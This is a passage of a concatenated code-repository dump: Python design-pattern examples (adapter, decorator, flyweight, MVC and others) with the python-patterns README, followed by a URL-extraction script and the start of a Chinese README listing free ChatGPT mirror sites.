charge a phone somewhere that has outlets in a different shape. Following this idea, the Adapter pattern is useful to integrate classes that couldn't be integrated due to their incompatible interfaces. *What does this example do? The example has classes that represent entities (Dog, Cat, Human, Car) that make different noises. The Adapter class provides a different interface to the original methods that make such noises. So the original interfaces (e.g., bark and meow) are available under a different name: make_noise. *Where is the pattern used practically? The Grok framework uses adapters to make objects work with a particular API without modifying the objects themselves: http://grok.zope.org/doc/current/grok_overview.html#adapters *References: http://ginstrom.com/scribbles/2008/11/06/generic-adapter-class-in-python/ https://sourcemaking.com/design_patterns/adapter http://python-3-patterns-idioms-test.readthedocs.io/en/latest/ChangeInterface.html#adapter *TL;DR Allows the interface of an existing class to be used as another interface. """ from typing import Callable, TypeVar T = TypeVar("T") class Dog: def __init__(self) -> None: self.name = "Dog" def bark(self) -> str: return "woof!" class Cat: def __init__(self) -> None: self.name = "Cat" def meow(self) -> str: return "meow!" class Human: def __init__(self) -> None: self.name = "Human" def speak(self) -> str: return "'hello'" class Car: def __init__(self) -> None: self.name = "Car" def make_noise(self, octane_level: int) -> str: return f"vroom{'!' * octane_level}" class Adapter: """Adapts an object by replacing methods. 
Usage ------ dog = Dog() dog = Adapter(dog, make_noise=dog.bark) """ def __init__(self, obj: T, **adapted_methods: Callable): """We set the adapted methods in the object's dict.""" self.obj = obj self.__dict__.update(adapted_methods) def __getattr__(self, attr): """All non-adapted calls are passed to the object.""" return getattr(self.obj, attr) def original_dict(self): """Print original object dict.""" return self.obj.__dict__ def main(): """ >>> objects = [] >>> dog = Dog() >>> print(dog.__dict__) {'name': 'Dog'} >>> objects.append(Adapter(dog, make_noise=dog.bark)) >>> objects[0].__dict__['obj'], objects[0].__dict__['make_noise'] (<...Dog object at 0x...>, <bound method Dog.bark of <...Dog object at 0x...>>) >>> print(objects[0].original_dict()) {'name': 'Dog'} >>> cat = Cat() >>> objects.append(Adapter(cat, make_noise=cat.meow)) >>> human = Human() >>> objects.append(Adapter(human, make_noise=human.speak)) >>> car = Car() >>> objects.append(Adapter(car, make_noise=lambda: car.make_noise(3))) >>> for obj in objects: ... print("A {0} goes {1}".format(obj.name, obj.make_noise())) A Dog goes woof! A Cat goes meow! A Human goes 'hello' A Car goes vroom!!! """ if __name__ == "__main__": import doctest doctest.testmod(optionflags=doctest.ELLIPSIS) File: patterns/structural/decorator.py """ *What is this pattern about? The Decorator pattern is used to dynamically add a new feature to an object without changing its implementation. It differs from inheritance because the new feature is added only to that particular object, not to the entire subclass. *What does this example do? This example shows a way to add formatting options (boldface and italic) to a text by appending the corresponding tags (<b> and <i>). Also, we can see that decorators can be applied one after the other, since the original text is passed to the bold wrapper, which in turn is passed to the italic wrapper. *Where is the pattern used practically? The Grok framework uses decorators to add functionalities to methods, like permissions or subscription to an event: http://grok.zope.org/doc/current/reference/decorators.html *References: https://sourcemaking.com/design_patterns/decorator *TL;DR Adds behaviour to object without affecting its class. """ class TextTag: """Represents a base text tag""" def __init__(self, text: str) -> None: self._text = text def render(self) -> str: return self._text class BoldWrapper(TextTag): """Wraps a tag in <b>""" def __init__(self, wrapped: TextTag) -> None: self._wrapped = wrapped def render(self) -> str: return f"<b>{self._wrapped.render()}</b>" class ItalicWrapper(TextTag): """Wraps a tag in <i>""" def __init__(self, wrapped: TextTag) -> None: self._wrapped = wrapped def render(self) -> str: return f"<i>{self._wrapped.render()}</i>" def main(): """ >>> simple_hello = TextTag("hello, world!") >>> special_hello = ItalicWrapper(BoldWrapper(simple_hello)) >>> print("before:", simple_hello.render()) before: hello, world! >>> print("after:", special_hello.render()) after: <i><b>hello, world!</b></i> """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/structural/flyweight.py """ *What is this pattern about? This pattern aims to minimise the number of objects that are needed by a program at run-time. A Flyweight is an object shared by multiple contexts, and is indistinguishable from an object that is not shared. The state of a Flyweight should not be affected by it's context, this is known as its intrinsic state. 
The decoupling of the objects state from the object's context, allows the Flyweight to be shared. *What does this example do? The example below sets-up an 'object pool' which stores initialised objects. When a 'Card' is created it first checks to see if it already exists instead of creating a new one. This aims to reduce the number of objects initialised by the program. *References: http://codesnipers.com/?q=python-flyweights https://python-patterns.guide/gang-of-four/flyweight/ *Examples in Python ecosystem: https://docs.python.org/3/library/sys.html#sys.intern *TL;DR Minimizes memory usage by sharing data with other similar objects. """ import weakref class Card: """The Flyweight""" # Could be a simple dict. # With WeakValueDictionary garbage collection can reclaim the object # when there are no other references to it. _pool: weakref.WeakValueDictionary = weakref.WeakValueDictionary() def __new__(cls, value, suit): # If the object exists in the pool - just return it obj = cls._pool.get(value + suit) # otherwise - create new one (and add it to the pool) if obj is None: obj = object.__new__(Card) cls._pool[value + suit] = obj # This row does the part we usually see in `__init__` obj.value, obj.suit = value, suit return obj # If you uncomment `__init__` and comment-out `__new__` - # Card becomes normal (non-flyweight). # def __init__(self, value, suit): # self.value, self.suit = value, suit def __repr__(self): return f"<Card: {self.value}{self.suit}>" def main(): """ >>> c1 = Card('9', 'h') >>> c2 = Card('9', 'h') >>> c1, c2 (<Card: 9h>, <Card: 9h>) >>> c1 == c2 True >>> c1 is c2 True >>> c1.new_attr = 'temp' >>> c3 = Card('9', 'h') >>> hasattr(c3, 'new_attr') True >>> Card._pool.clear() >>> c4 = Card('9', 'h') >>> hasattr(c4, 'new_attr') False """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/structural/bridge.py """ *References: http://en.wikibooks.org/wiki/Computer_Science_Design_Patterns/Bridge_Pattern#Python *TL;DR Decouples an abstraction from its implementation. """ # ConcreteImplementor 1/2 class DrawingAPI1: def draw_circle(self, x, y, radius): print(f"API1.circle at {x}:{y} radius {radius}") # ConcreteImplementor 2/2 class DrawingAPI2: def draw_circle(self, x, y, radius): print(f"API2.circle at {x}:{y} radius {radius}") # Refined Abstraction class CircleShape: def __init__(self, x, y, radius, drawing_api): self._x = x self._y = y self._radius = radius self._drawing_api = drawing_api # low-level i.e. Implementation specific def draw(self): self._drawing_api.draw_circle(self._x, self._y, self._radius) # high-level i.e. Abstraction specific def scale(self, pct): self._radius *= pct def main(): """ >>> shapes = (CircleShape(1, 2, 3, DrawingAPI1()), CircleShape(5, 7, 11, DrawingAPI2())) >>> for shape in shapes: ... shape.scale(2.5) ... shape.draw() API1.circle at 1:2 radius 7.5 API2.circle at 5:7 radius 27.5 """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/structural/__init__.py File: patterns/structural/3-tier.py """ *TL;DR Separates presentation, application processing, and data management functions. 
""" from typing import Dict, KeysView, Optional, Union class Data: """Data Store Class""" products = { "milk": {"price": 1.50, "quantity": 10}, "eggs": {"price": 0.20, "quantity": 100}, "cheese": {"price": 2.00, "quantity": 10}, } def __get__(self, obj, klas): print("(Fetching from Data Store)") return {"products": self.products} class BusinessLogic: """Business logic holding data store instances""" data = Data() def product_list(self) -> KeysView[str]: return self.data["products"].keys() def product_information( self, product: str ) -> Optional[Dict[str, Union[int, float]]]: return self.data["products"].get(product, None) class Ui: """UI interaction class""" def __init__(self) -> None: self.business_logic = BusinessLogic() def get_product_list(self) -> None: print("PRODUCT LIST:") for product in self.business_logic.product_list(): print(product) print("") def get_product_information(self, product: str) -> None: product_info = self.business_logic.product_information(product) if product_info: print("PRODUCT INFORMATION:") print( f"Name: {product.title()}, " + f"Price: {product_info.get('price', 0):.2f}, " + f"Quantity: {product_info.get('quantity', 0):}" ) else: print(f"That product '{product}' does not exist in the records") def main(): """ >>> ui = Ui() >>> ui.get_product_list() PRODUCT LIST: (Fetching from Data Store) milk eggs cheese <BLANKLINE> >>> ui.get_product_information("cheese") (Fetching from Data Store) PRODUCT INFORMATION: Name: Cheese, Price: 2.00, Quantity: 10 >>> ui.get_product_information("eggs") (Fetching from Data Store) PRODUCT INFORMATION: Name: Eggs, Price: 0.20, Quantity: 100 >>> ui.get_product_information("milk") (Fetching from Data Store) PRODUCT INFORMATION: Name: Milk, Price: 1.50, Quantity: 10 >>> ui.get_product_information("arepas") (Fetching from Data Store) That product 'arepas' does not exist in the records """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/structural/composite.py """ *What is this pattern about? The composite pattern describes a group of objects that is treated the same way as a single instance of the same type of object. The intent of a composite is to "compose" objects into tree structures to represent part-whole hierarchies. Implementing the composite pattern lets clients treat individual objects and compositions uniformly. *What does this example do? The example implements a graphic class,which can be either an ellipse or a composition of several graphics. Every graphic can be printed. *Where is the pattern used practically? In graphics editors a shape can be basic or complex. An example of a simple shape is a line, where a complex shape is a rectangle which is made of four line objects. Since shapes have many operations in common such as rendering the shape to screen, and since shapes follow a part-whole hierarchy, composite pattern can be used to enable the program to deal with all shapes uniformly. *References: https://en.wikipedia.org/wiki/Composite_pattern https://infinitescript.com/2014/10/the-23-gang-of-three-design-patterns/ *TL;DR Describes a group of objects that is treated as a single instance. 
""" from abc import ABC, abstractmethod from typing import List class Graphic(ABC): @abstractmethod def render(self) -> None: raise NotImplementedError("You should implement this!") class CompositeGraphic(Graphic): def __init__(self) -> None: self.graphics: List[Graphic] = [] def render(self) -> None: for graphic in self.graphics: graphic.render() def add(self, graphic: Graphic) -> None: self.graphics.append(graphic) def remove(self, graphic: Graphic) -> None: self.graphics.remove(graphic) class Ellipse(Graphic): def __init__(self, name: str) -> None: self.name = name def render(self) -> None: print(f"Ellipse: {self.name}") def main(): """ >>> ellipse1 = Ellipse("1") >>> ellipse2 = Ellipse("2") >>> ellipse3 = Ellipse("3") >>> ellipse4 = Ellipse("4") >>> graphic1 = CompositeGraphic() >>> graphic2 = CompositeGraphic() >>> graphic1.add(ellipse1) >>> graphic1.add(ellipse2) >>> graphic1.add(ellipse3) >>> graphic2.add(ellipse4) >>> graphic = CompositeGraphic() >>> graphic.add(graphic1) >>> graphic.add(graphic2) >>> graphic.render() Ellipse: 1 Ellipse: 2 Ellipse: 3 Ellipse: 4 """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/structural/front_controller.py """ @author: Gordeev Andrey <[email protected]> *TL;DR Provides a centralized entry point that controls and manages request handling. """ from __future__ import annotations from typing import Any class MobileView: def show_index_page(self) -> None: print("Displaying mobile index page") class TabletView: def show_index_page(self) -> None: print("Displaying tablet index page") class Dispatcher: def __init__(self) -> None: self.mobile_view = MobileView() self.tablet_view = TabletView() def dispatch(self, request: Request) -> None: """ This function is used to dispatch the request based on the type of device. If it is a mobile, then mobile view will be called and if it is a tablet, then tablet view will be called. Otherwise, an error message will be printed saying that cannot dispatch the request. """ if request.type == Request.mobile_type: self.mobile_view.show_index_page() elif request.type == Request.tablet_type: self.tablet_view.show_index_page() else: print("Cannot dispatch the request") class RequestController: """front controller""" def __init__(self) -> None: self.dispatcher = Dispatcher() def dispatch_request(self, request: Any) -> None: """ This function takes a request object and sends it to the dispatcher. 
""" if isinstance(request, Request): self.dispatcher.dispatch(request) else: print("request must be a Request object") class Request: """request""" mobile_type = "mobile" tablet_type = "tablet" def __init__(self, request): self.type = None request = request.lower() if request == self.mobile_type: self.type = self.mobile_type elif request == self.tablet_type: self.type = self.tablet_type def main(): """ >>> front_controller = RequestController() >>> front_controller.dispatch_request(Request('mobile')) Displaying mobile index page >>> front_controller.dispatch_request(Request('tablet')) Displaying tablet index page >>> front_controller.dispatch_request(Request('desktop')) Cannot dispatch the request >>> front_controller.dispatch_request('mobile') request must be a Request object """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/structural/flyweight_with_metaclass.py import weakref class FlyweightMeta(type): def __new__(mcs, name, parents, dct): """ Set up object pool :param name: class name :param parents: class parents :param dct: dict: includes class attributes, class methods, static methods, etc :return: new class """ dct["pool"] = weakref.WeakValueDictionary() return super().__new__(mcs, name, parents, dct) @staticmethod def _serialize_params(cls, *args, **kwargs): """ Serialize input parameters to a key. Simple implementation is just to serialize it as a string """ args_list = list(map(str, args)) args_list.extend([str(kwargs), cls.__name__]) key = "".join(args_list) return key def __call__(cls, *args, **kwargs): key = FlyweightMeta._serialize_params(cls, *args, **kwargs) pool = getattr(cls, "pool", {}) instance = pool.get(key) if instance is None: instance = super().__call__(*args, **kwargs) pool[key] = instance return instance class Card2(metaclass=FlyweightMeta): def __init__(self, *args, **kwargs): # print('Init {}: {}'.format(self.__class__, (args, kwargs))) pass if __name__ == "__main__": instances_pool = getattr(Card2, "pool") cm1 = Card2("10", "h", a=1) cm2 = Card2("10", "h", a=1) cm3 = Card2("10", "h", a=2) assert (cm1 == cm2) and (cm1 != cm3) assert (cm1 is cm2) and (cm1 is not cm3) assert len(instances_pool) == 2 del cm1 assert len(instances_pool) == 2 del cm2 assert len(instances_pool) == 1 del cm3 assert len(instances_pool) == 0 File: patterns/structural/mvc.py """ *TL;DR Separates data in GUIs from the ways it is presented, and accepted. 
""" from abc import ABC, abstractmethod class Model(ABC): @abstractmethod def __iter__(self): pass @abstractmethod def get(self, item): """Returns an object with a .items() call method that iterates over key,value pairs of its information.""" pass @property @abstractmethod def item_type(self): pass class ProductModel(Model): class Price(float): """A polymorphic way to pass a float with a particular __str__ functionality.""" def __str__(self): return f"{self:.2f}" products = { "milk": {"price": Price(1.50), "quantity": 10}, "eggs": {"price": Price(0.20), "quantity": 100}, "cheese": {"price": Price(2.00), "quantity": 10}, } item_type = "product" def __iter__(self): yield from self.products def get(self, product): try: return self.products[product] except KeyError as e: raise KeyError(str(e) + " not in the model's item list.") class View(ABC): @abstractmethod def show_item_list(self, item_type, item_list): pass @abstractmethod def show_item_information(self, item_type, item_name, item_info): """Will look for item information by iterating over key,value pairs yielded by item_info.items()""" pass @abstractmethod def item_not_found(self, item_type, item_name): pass class ConsoleView(View): def show_item_list(self, item_type, item_list): print(item_type.upper() + " LIST:") for item in item_list: print(item) print("") @staticmethod def capitalizer(string): return string[0].upper() + string[1:].lower() def show_item_information(self, item_type, item_name, item_info): print(item_type.upper() + " INFORMATION:") printout = "Name: %s" % item_name for key, value in item_info.items(): printout += ", " + self.capitalizer(str(key)) + ": " + str(value) printout += "\n" print(printout) def item_not_found(self, item_type, item_name): print(f'That {item_type} "{item_name}" does not exist in the records') class Controller: def __init__(self, model, view): self.model = model self.view = view def show_items(self): items = list(self.model) item_type = self.model.item_type self.view.show_item_list(item_type, items) def show_item_information(self, item_name): """ Show information about a {item_type} item. :param str item_name: the name of the {item_type} item to show information about """ try: item_info = self.model.get(item_name) except Exception: item_type = self.model.item_type self.view.item_not_found(item_type, item_name) else: item_type = self.model.item_type self.view.show_item_information(item_type, item_name, item_info) def main(): """ >>> model = ProductModel() >>> view = ConsoleView() >>> controller = Controller(model, view) >>> controller.show_items() PRODUCT LIST: milk eggs cheese <BLANKLINE> >>> controller.show_item_information("cheese") PRODUCT INFORMATION: Name: cheese, Price: 2.00, Quantity: 10 <BLANKLINE> >>> controller.show_item_information("eggs") PRODUCT INFORMATION: Name: eggs, Price: 0.20, Quantity: 100 <BLANKLINE> >>> controller.show_item_information("milk") PRODUCT INFORMATION: Name: milk, Price: 1.50, Quantity: 10 <BLANKLINE> >>> controller.show_item_information("arepas") That product "arepas" does not exist in the records """ if __name__ == "__main__": import doctest doctest.testmod()
python-patterns =============== A collection of design patterns and idioms in Python. Remember that each pattern has its own trade-offs. And you need to pay attention more to why you're choosing a certain pattern than to how to implement it. Current Patterns ---------------- __Creational Patterns__: | Pattern | Description | |:-------:| ----------- | | [abstract_factory](patterns/creational/abstract_factory.py) | use a generic function with specific factories | | [borg](patterns/creational/borg.py) | a singleton with shared-state among instances | | [builder](patterns/creational/builder.py) | instead of using multiple constructors, builder object receives parameters and returns constructed objects | | [factory](patterns/creational/factory.py) | delegate a specialized function/method to create instances | | [lazy_evaluation](patterns/creational/lazy_evaluation.py) | lazily-evaluated property pattern in Python | | [pool](patterns/creational/pool.py) | preinstantiate and maintain a group of instances of the same type | | [prototype](patterns/creational/prototype.py) | use a factory and clones of a prototype for new instances (if instantiation is expensive) | __Structural Patterns__: | Pattern | Description | |:-------:| ----------- | | [3-tier](patterns/structural/3-tier.py) | data<->business logic<->presentation separation (strict relationships) | | [adapter](patterns/structural/adapter.py) | adapt one interface to another using a white-list | | [bridge](patterns/structural/bridge.py) | a client-provider middleman to soften interface changes | | [composite](patterns/structural/composite.py) | lets clients treat individual objects and compositions uniformly | | [decorator](patterns/structural/decorator.py) | wrap functionality with other functionality in order to affect outputs | | [facade](patterns/structural/facade.py) | use one class as an API to a number of others | | [flyweight](patterns/structural/flyweight.py) | transparently reuse existing instances of objects with similar/identical state | | [front_controller](patterns/structural/front_controller.py) | single handler requests coming to the application | | [mvc](patterns/structural/mvc.py) | model<->view<->controller (non-strict relationships) | | [proxy](patterns/structural/proxy.py) | an object funnels operations to something else | __Behavioral Patterns__: | Pattern | Description | |:-------:| ----------- | | [chain_of_responsibility](patterns/behavioral/chain_of_responsibility.py) | apply a chain of successive handlers to try and process the data | | [catalog](patterns/behavioral/catalog.py) | general methods will call different specialized methods based on construction parameter | | [chaining_method](patterns/behavioral/chaining_method.py) | continue callback next object method | | [command](patterns/behavioral/command.py) | bundle a command and arguments to call later | | [iterator](patterns/behavioral/iterator.py) | traverse a container and access the container's elements | | [iterator](patterns/behavioral/iterator_alt.py) (alt. 
impl.)| traverse a container and access the container's elements | | [mediator](patterns/behavioral/mediator.py) | an object that knows how to connect other objects and act as a proxy | | [memento](patterns/behavioral/memento.py) | generate an opaque token that can be used to go back to a previous state | | [observer](patterns/behavioral/observer.py) | provide a callback for notification of events/changes to data | | [publish_subscribe](patterns/behavioral/publish_subscribe.py) | a source syndicates events/data to 0+ registered listeners | | [registry](patterns/behavioral/registry.py) | keep track of all subclasses of a given class | | [specification](patterns/behavioral/specification.py) | business rules can be recombined by chaining the business rules together using boolean logic | | [state](patterns/behavioral/state.py) | logic is organized into a discrete number of potential states and the next state that can be transitioned to | | [strategy](patterns/behavioral/strategy.py) | selectable operations over the same data | | [template](patterns/behavioral/template.py) | an object imposes a structure but takes pluggable components | | [visitor](patterns/behavioral/visitor.py) | invoke a callback for all items of a collection | __Design for Testability Patterns__: | Pattern | Description | |:-------:| ----------- | | [dependency_injection](patterns/dependency_injection.py) | 3 variants of dependency injection | __Fundamental Patterns__: | Pattern | Description | |:-------:| ----------- | | [delegation_pattern](patterns/fundamental/delegation_pattern.py) | an object handles a request by delegating to a second object (the delegate) | __Others__: | Pattern | Description | |:-------:| ----------- | | [blackboard](patterns/other/blackboard.py) | architectural model, assemble different sub-system knowledge to build a solution, AI approach - non gang of four pattern | | [graph_search](patterns/other/graph_search.py) | graphing algorithms - non gang of four pattern | | [hsm](patterns/other/hsm/hsm.py) | hierarchical state machine - non gang of four pattern | Videos ------ [Design Patterns in Python by Peter Ullrich](https://www.youtube.com/watch?v=bsyjSW46TDg) [Sebastian Buczyński - Why you don't need design patterns in Python?](https://www.youtube.com/watch?v=G5OeYHCJuv0) [You Don't Need That!](https://www.youtube.com/watch?v=imW-trt0i9I) [Pluggable Libs Through Design Patterns](https://www.youtube.com/watch?v=PfgEU3W0kyU) Contributing ------------ When an implementation is added or modified, please review the following guidelines: ##### Docstrings Add module level description in form of a docstring with links to corresponding references or other useful information. Add "Examples in Python ecosystem" section if you know some. It shows how patterns could be applied to real-world problems. [facade.py](patterns/structural/facade.py) has a good example of detailed description, but sometimes the shorter one as in [template.py](patterns/behavioral/template.py) would suffice. ##### Python 2 compatibility To see Python 2 compatible versions of some patterns please check-out the [legacy](https://github.com/faif/python-patterns/tree/legacy) tag. ##### Update README When everything else is done - update corresponding part of README. ##### Travis CI Please run the following before submitting a patch - `black .` This lints your code. Then either: - `tox` or `tox -e ci37` This runs unit tests. see tox.ini for further details. 
- If you have a bash-compatible shell, use `./lint.sh`

This script will lint and test your code; it mirrors the CI pipeline actions.

You can also run the `flake8` or `pytest` commands manually. Examples can be found in `tox.ini`.

## Contributing via issue triage [![Open Source Helpers](https://www.codetriage.com/faif/python-patterns/badges/users.svg)](https://www.codetriage.com/faif/python-patterns)

You can triage issues and pull requests, which may include reproducing bug reports or asking for vital information such as version numbers or reproduction instructions.

If you would like to start triaging issues, one easy way to get started is to [subscribe to python-patterns on CodeTriage](https://www.codetriage.com/faif/python-patterns).

## AI codebase assistance

The folks at Mutable.ai have built an AI assistant that is codebase-aware. Give it a try: [![Mutable.ai Auto Wiki](https://img.shields.io/badge/Auto_Wiki-Mutable.ai-blue)](https://wiki.mutable.ai/faif/python-patterns)
awesome-free-chatgpt
da28eb22153b4a34eae188335a27f14d411f7d6c
File: convert.py


# Convert the URLs in README.md to JSON and save them to urls.json;
# collapse duplicate URLs and strip the trailing `/` from each URL.

import json
import re

# Read the content of README.md
with open("README.md", "r", encoding="utf-8") as file:
    content = file.read()

# Stop reading when reaching the line that contains '### 🚫 已失效'
# (the "no longer working" section)
content = content.split('### 🚫 已失效')[0]

# Find all URLs in the content (only those immediately followed by ']')
urls = re.findall(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+(?=\])', content)
# urls = re.findall(r'(?<!~~)(http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+)(?!~~)', content)

# Remove the trailing '/' from each URL and collapse duplicates
unique_urls = []
for url in urls:
    url = url[:-1] if url.endswith('/') else url
    if url not in unique_urls:
        unique_urls.append(url)

# Save the URLs to urls.json
with open("urls.json", "w") as file:
    json.dump(unique_urls, file)
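

# A quick, hypothetical sanity check of the normalisation rules above
# (separate from the real README parsing): trailing slashes are stripped
# and duplicate URLs collapse to a single entry, preserving first-seen order.
def _normalise(urls):
    unique = []
    for url in urls:
        url = url[:-1] if url.endswith('/') else url
        if url not in unique:
            unique.append(url)
    return unique


assert _normalise(
    ["https://example.com/", "https://example.com", "https://example.com/chat/"]
) == ["https://example.com", "https://example.com/chat"]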
# Awesome Free ChatGPT ![Awesome](https://cdn.jsdelivr.net/gh/LiLittleCat/PicBed/svg/awesome/badge.svg) [![English](https://cdn.jsdelivr.net/gh/LiLittleCat/PicBed/svg/lang/english.svg)](README_en.md) ![website count](https://img.shields.io/badge/websites-297-blue?style=flat) ![last-commit](https://img.shields.io/github/last-commit/LiLittleCat/awesome-free-chatgpt?style=flat&amp;label=last&nbsp;commit) > 4 月 1 日,OpenAI 宣布可以不登录即可使用 ChatGPT 3.5,参阅 [Start using ChatGPT instantly](https://openai.com/blog/start-using-chatgpt-instantly)。 🎁 免费的 ChatGPT (<https://chatgpt.com>)(<https://chat.openai.com>) 镜像网站列表,以及更多免费资源,持续更新。 此处列出的网站均来源于互联网,请注意不要在这些网站上输入任何个人敏感信息。 🌈 欢迎贡献 - [添加镜像站点](https://github.com/LiLittleCat/awesome-free-chatgpt/issues/new?assignees=LiLittleCat&labels=&projects=&template=%E6%B7%BB%E5%8A%A0%E9%95%9C%E5%83%8F%E7%AB%99%E7%82%B9.md&title=%E6%B7%BB%E5%8A%A0%E9%95%9C%E5%83%8F%E7%AB%99%E7%82%B9) - [反馈站点失效](https://github.com/LiLittleCat/awesome-free-chatgpt/issues/new?assignees=LiLittleCat&labels=&projects=&template=%E5%8F%8D%E9%A6%88%E7%AB%99%E7%82%B9%E5%A4%B1%E6%95%88.md&title=%E5%8F%8D%E9%A6%88%E7%AB%99%E7%82%B9%E5%A4%B1%E6%95%88) - 更多(todo) 如果您发现此项目有用,不要忘记 star 🌟,您的支持是我前进的动力。 --- | 🏆 赞助商 🏆 | |:------------------------------------------------------------------------------------------------:| | 👉 [WikeAI](https://wike.ai/) 支持 GPT4、Claude3、GPT-3.5-turbo(免费无限制)、Gemini Pro(免费无限制)、助手/绘画、语音合成。 | --- ## 目录 <!-- TOC --> * [Awesome Free ChatGPT](#awesome-free-chatgpt) * [目录](#目录) * [💬 ChatGPT 镜像列表](#-chatgpt-镜像列表) * [🗨️ ChatGPT 替代方案](#-chatgpt-替代方案) * [📚 更多...](#-更多) * [💿 构建你自己的 ChatGPT 镜像](#-构建你自己的-chatgpt-镜像) * [💡 提示词(Prompt)](#-提示词prompt) * [📝 自建内容库](#-自建内容库) * [💻 开发者工具](#-开发者工具) * [🌟 Star History](#-star-history) * [💞 Contributors](#-contributors) <!-- TOC --> ## 💬 ChatGPT 镜像列表 > 注: > > 1. 排序规则,见 [#80](https://github.com/LiLittleCat/awesome-free-chatgpt/discussions/80) > 2. 
标签含义 > - 🆓完全免费,打开即用 > - 🔓有免费额度 > - 🔒需要登陆 > - 🔑需要输入 API Key > - 💰需要充值 > - 👀需要关注公众号 > - 💪支持 GPT4 > - 🧰不仅仅是 Chat,支持其他模型或其他功能 > - 🌎需要国际网络 > - 🏆赞助商 <!-- normal-begin --> <table> <thead> <tr> <th>序号</th> <th>网站</th> <th>标签</th> <th>添加时间</th> <th>备注</th> </tr> </thead> <tbody> <tr> <td>1</td> <td> <a href="https://chat5.aiyunos.top" target="_blank">https://chat5.aiyunos.top</a> <br> </td> <td> 🏆 🆓 💪 🧰 </td> <td>2023-11-15</td> <td></td> </tr> <tr> <td>2</td> <td> <a href="https://chat.tinycms.xyz:3002" target="_blank">https://chat.tinycms.xyz:3002</a> <br> </td> <td> 🏆 🆓 💪 </td> <td>2023-08-14</td> <td></td> </tr> <tr> <td>3</td> <td> <a href="https://lite.icoding.ink/" target="_blank">https://lite.icoding.ink/</a> <br> </td> <td> 🆓 💪 🧰 </td> <td>2024-07-23</td> <td></td> </tr> <tr> <td>4</td> <td> <a href="https://chat.ai365vip.com/" target="_blank">https://chat.ai365vip.com/</a> <br> </td> <td> 🆓 💪 🧰 </td> <td>2024-07-01</td> <td></td> </tr> <tr> <td>5</td> <td> <a href="https://myai.asia/" target="_blank">https://myai.asia/</a> <br> </td> <td> 🆓 💪 🧰 </td> <td>2024-06-23</td> <td></td> </tr> <tr> <td>6</td> <td> <a href="https://free.netfly.top/" target="_blank">https://free.netfly.top/</a> <br> </td> <td> 🆓 💪 </td> <td>2024-07-21</td> <td></td> </tr> <tr> <td>7</td> <td> <a href="https://claude.free2gpt.xyz" target="_blank">https://claude.free2gpt.xyz</a> <br> </td> <td> 🆓 💪 </td> <td>2024-07-05</td> <td>免费 Claude 3.5 Sonnet,限 120 次/天</td> </tr> <tr> <td>8</td> <td> <a href="https://origin.eqing.tech/" target="_blank">https://origin.eqing.tech/</a> <br> </td> <td> 🆓 💪 </td> <td>2024-06-27</td> <td></td> </tr> <tr> <td>9</td> <td> <a href="https://www.yeschat.ai/zh-CN/gpt-4o" target="_blank">https://www.yeschat.ai/zh-CN/gpt-4o</a> <br> </td> <td> 🆓 💪 </td> <td>2024-06-13</td> <td></td> </tr> <tr> <td>10</td> <td> <a href="https://chat.freeuse.top/" target="_blank">https://chat.freeuse.top/</a> <br> </td> <td> 🆓 💪 </td> <td>2024-04-30</td> <td></td> </tr> <tr> <td>11</td> <td> <a href="https://aitopk.com/" target="_blank">https://aitopk.com/</a> <br> </td> <td> 🆓 💪 </td> <td>2024-03-21</td> <td></td> </tr> <tr> <td>12</td> <td> <a href="https://sharedchat.cn/shared.html" target="_blank">https://sharedchat.cn/shared.html</a> <br> </td> <td> 🆓 💪 </td> <td>2024-02-21</td> <td></td> </tr> <tr> <td>13</td> <td> <a href="https://chat.icoding.ink/pc-chat/#/questions" target="_blank">https://chat.icoding.ink/pc-chat/#/questions</a> <br> </td> <td> 🆓 💪 </td> <td>2024-02-06</td> <td></td> </tr> <tr> <td>14</td> <td> <a href="https://www.zxf7460.cn/" target="_blank">https://www.zxf7460.cn/</a> <br> </td> <td> 🆓 🔓 💪 🧰 </td> <td>2024-06-13</td> <td></td> </tr> <tr> <td>15</td> <td> <a href="https://ai.myym.fun" target="_blank">https://ai.myym.fun</a> <br> </td> <td> 🆓 💪 🧰 🌎 </td> <td>2024-06-06</td> <td></td> </tr> <tr> <td>16</td> <td> <a href="https://chatnio.liujiarong.top/" target="_blank">https://chatnio.liujiarong.top/</a> <br> </td> <td> 🆓 🧰 </td> <td>2024-05-20</td> <td></td> </tr> <tr> <td>17</td> <td> <a href="https://www.ichat2019.com/" target="_blank">https://www.ichat2019.com/</a> <br> </td> <td> 🆓 🔓 💪 🧰 </td> <td>2024-02-01</td> <td></td> </tr> <tr> <td>18</td> <td> <a href="http://nmwaicg.top/" target="_blank">http://nmwaicg.top/</a> <br> </td> <td> 🆓 🔓 💪 🧰 </td> <td>2024-01-27</td> <td></td> </tr> <tr> <td>19</td> <td> <a href="https://newpc.icoding.ink/?debug=true" target="_blank">https://newpc.icoding.ink/?debug=true</a> <br> </td> <td> 🆓 🧰 </td> <td>2023-10-18</td> <td></td> </tr> <tr> 
